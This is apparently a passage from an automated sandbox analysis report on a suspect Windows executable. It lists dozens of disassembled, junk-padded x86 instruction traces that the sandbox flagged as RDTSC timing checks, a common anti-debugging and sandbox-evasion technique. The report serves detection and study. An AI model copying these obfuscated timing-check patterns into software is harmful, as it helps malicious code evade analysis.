Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2753FF second address: 275436 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F05491602D6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jnl 00007F05491602DEh 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 jng 00007F05491602ECh 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F05491602DEh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27436C second address: 274370 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27A5E1 second address: 27A5E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27A5E6 second address: 27A5EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27A5EB second address: 27A615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F05491602E3h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F05491602DEh 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 jng 00007F05491602D6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 279DE2 second address: 279DE7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 279F9D second address: 279FA7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F05491602D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27A386 second address: 27A38A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 23BB43 second address: 23BB49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 23BB49 second address: 23BB5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F054911993Bh 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27C300 second address: 27C31C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F05491602D6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27C3BA second address: 27C455 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F054911994Ah 0x0000000c jmp 00007F0549119944h 0x00000011 popad 0x00000012 add dword ptr [esp], 2D96D14Fh 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007F0549119938h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 mov dword ptr [ebp+122D1CA7h], ecx 0x00000039 call 00007F0549119939h 0x0000003e pushad 0x0000003f pushad 0x00000040 jmp 00007F054911993Fh 0x00000045 push ebx 0x00000046 pop ebx 0x00000047 popad 0x00000048 pushad 0x00000049 push esi 0x0000004a pop esi 0x0000004b push eax 0x0000004c pop eax 0x0000004d popad 0x0000004e popad 0x0000004f push eax 0x00000050 pushad 0x00000051 jmp 00007F054911993Bh 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F0549119949h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27C455 second address: 27C478 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F05491602D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F05491602E2h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27C478 second address: 27C4C1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 js 00007F0549119936h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f pushad 0x00000010 jp 00007F0549119936h 0x00000016 jmp 00007F0549119941h 0x0000001b popad 0x0000001c js 00007F0549119938h 0x00000022 push edx 0x00000023 pop edx 0x00000024 popad 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F0549119942h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27C4C1 second address: 27C4C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27C733 second address: 27C737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27C737 second address: 27C740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27C802 second address: 27C817 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F054911993Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27C9C2 second address: 27C9CC instructions: 0x00000000 rdtsc 0x00000002 js 00007F05491602DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27C9CC second address: 27C9E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0549119940h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27CA8A second address: 27CA90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27D6D6 second address: 27D6E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27D6E2 second address: 27D70C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F05491602E5h 0x0000000a popad 0x0000000b nop 0x0000000c mov esi, dword ptr [ebp+122D3A77h] 0x00000012 xchg eax, ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push esi 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27D70C second address: 27D711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27DC05 second address: 27DC89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a stc 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F05491602D8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push eax 0x00000028 je 00007F05491602DCh 0x0000002e mov edi, dword ptr [ebp+122D3A77h] 0x00000034 pop esi 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ecx 0x0000003a call 00007F05491602D8h 0x0000003f pop ecx 0x00000040 mov dword ptr [esp+04h], ecx 0x00000044 add dword ptr [esp+04h], 0000001Dh 0x0000004c inc ecx 0x0000004d push ecx 0x0000004e ret 0x0000004f pop ecx 0x00000050 ret 0x00000051 je 00007F05491602D6h 0x00000057 mov esi, dword ptr [ebp+122D2BC0h] 0x0000005d xchg eax, ebx 0x0000005e push ebx 0x0000005f push eax 0x00000060 push edx 0x00000061 jns 00007F05491602D6h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27F706 second address: 27F70A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27F7B1 second address: 27F7B7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27F7B7 second address: 27F7BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27F7BD second address: 27F7C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 280280 second address: 280285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 281CBE second address: 281CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 236940 second address: 23694B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 23694B second address: 236953 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 282312 second address: 282316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 282BC2 second address: 282BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2869CC second address: 2869D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 28901E second address: 289022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 289022 second address: 28902C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0549119936h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 289524 second address: 28952F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F05491602D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 28B529 second address: 28B546 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119943h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 28B546 second address: 28B54B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 28C511 second address: 28C52B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0549119946h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 28C52B second address: 28C54E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 28C54E second address: 28C552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 28B793 second address: 28B79A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 28B79A second address: 28B79F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 28C552 second address: 28C56B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 28D6D9 second address: 28D6DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 28D6DE second address: 28D6F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05491602DFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 28E6B2 second address: 28E6B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 290595 second address: 2905AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F05491602DEh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 290666 second address: 29066A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 28F81B second address: 28F820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 28F820 second address: 28F827 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2945E6 second address: 29462F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 mov dword ptr [esp], eax 0x0000000b sub edi, 70349985h 0x00000011 push 00000000h 0x00000013 mov bx, di 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007F05491602D8h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 0000001Bh 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 push eax 0x00000033 pushad 0x00000034 jbe 00007F05491602D8h 0x0000003a push ecx 0x0000003b pop ecx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 29462F second address: 294633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 294633 second address: 294637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2938A6 second address: 2938AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 292840 second address: 292844 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 292844 second address: 29284A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2938AB second address: 2938D0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F05491602D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F05491602E4h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 29284A second address: 292850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2938D0 second address: 2938ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F05491602E6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 291826 second address: 291830 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0549119936h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 292850 second address: 292854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2947E1 second address: 2947E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 292854 second address: 2928CE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov bh, 49h 0x0000000d mov di, 46C2h 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov dword ptr [ebp+1246FF8Eh], eax 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 call 00007F05491602D8h 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], ecx 0x00000032 add dword ptr [esp+04h], 0000001Bh 0x0000003a inc ecx 0x0000003b push ecx 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f jnc 00007F05491602D7h 0x00000045 or bh, FFFFFF8Bh 0x00000048 mov eax, dword ptr [ebp+122D0095h] 0x0000004e movzx ebx, bx 0x00000051 push FFFFFFFFh 0x00000053 sbb di, A152h 0x00000058 call 00007F05491602DCh 0x0000005d cld 0x0000005e pop ebx 0x0000005f nop 0x00000060 push ecx 0x00000061 push eax 0x00000062 push edx 0x00000063 jns 00007F05491602D6h 0x00000069 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2928CE second address: 2928F4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0549119936h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0549119948h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2928F4 second address: 2928F9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 29488B second address: 294891 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 294891 second address: 294895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2956B8 second address: 2956CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119941h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2956CD second address: 2956E0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F05491602D8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 29671A second address: 296799 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F0549119947h 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 mov dword ptr [ebp+12468036h], edx 0x00000017 push 00000000h 0x00000019 jne 00007F0549119942h 0x0000001f jno 00007F0549119936h 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007F0549119938h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 0000001Dh 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 mov ebx, 7640CD10h 0x00000046 xchg eax, esi 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a jmp 00007F054911993Ah 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 296799 second address: 29679E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 29679E second address: 2967CE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F0549119944h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 jmp 00007F054911993Fh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2967CE second address: 2967D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2967D4 second address: 2967D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 297868 second address: 29786C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 29786C second address: 297876 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0549119936h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 296A65 second address: 296A6F instructions: 0x00000000 rdtsc 0x00000002 js 00007F05491602D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 296A6F second address: 296A75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 296A75 second address: 296A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 298863 second address: 298868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2979E6 second address: 2979EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2979EB second address: 2979F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 297AC4 second address: 297AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 297AC8 second address: 297ACC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 298A20 second address: 298A2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
